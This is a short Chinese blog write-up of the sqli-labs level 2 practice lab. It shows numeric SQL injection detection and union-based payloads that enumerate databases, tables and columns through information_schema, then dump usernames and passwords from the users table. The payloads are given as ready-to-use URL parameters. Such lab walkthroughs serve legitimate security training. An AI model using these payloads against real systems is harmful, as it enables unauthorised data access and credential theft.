sqli-labs-2
阿新 • • 發佈:2021-12-17
開啟網站
測試注入點和注入型別
?id=1
?id=3-2
結果與?id=1
結果一致
所以該關卡是數值型注入
**使用and 1
、and 0
測試注入點 **
1.
2.
經過上面兩個條件的測試,所以id為注入點
測試回顯列數和回顯資訊
回顯4列報錯,所以回顯的列數是3列
利用 union select 1,2,3
回顯資訊
利用information_schema
資料庫獲取資訊
1. 獲取資料庫版本、使用者名稱資訊、當前資料庫等資訊
2. 獲取所有資料庫的資訊
?id=-1 union select 1,2,group_concat(schema_name) from information_schema.schemata
3. 獲取security資料庫中所有表
?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="security"
3. 獲取users表中的欄位
?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name="users" and table_schema="security"
4. 獲取users表中的資訊
?id=-1 union select 1,2,group_concat(concat(username,'密碼為:',password)) from users
本文來自部落格園,作者:oldliutou,轉載請註明原文連結:https://www.cnblogs.com/oldliutou/p/15702601.html